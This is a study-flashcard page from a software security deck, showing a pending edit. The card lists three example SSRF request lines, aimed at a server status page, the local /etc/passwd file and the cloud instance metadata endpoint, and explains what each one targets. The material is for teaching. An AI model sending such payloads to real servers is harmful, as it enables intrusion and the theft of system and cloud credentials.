Review Note
Last Update: 04/27/2023 06:11 AM
Current Deck: Software Security
New Card (Unpublished)Currently Published Content
Front
Back
No published tags.
Pending Suggestions
Field Change Suggestions:
Front
Commit #1538
What are the following malicious SSRF HTTP requests intended to do?
1. GET /?url=http://localhost/server-status HTTP/1.1
2. GET /?url=file///etc/passwd HTTP/1.1
3. GET /?url=http://169.254.169.254/latest/meta-data HTTP/1.1
1. GET /?url=http://localhost/server-status HTTP/1.1
2. GET /?url=file///etc/passwd HTTP/1.1
3. GET /?url=http://169.254.169.254/latest/meta-data HTTP/1.1
Back
Commit #1538
1. Apache server endpoint to return server status (e.g., services running on the server)
2. Read a local file (/etc/passwd)
3. AWS EC2 and OpenStack cloud endpoint to get metadata for an instance
2. Read a local file (/etc/passwd)
3. AWS EC2 and OpenStack cloud endpoint to get metadata for an instance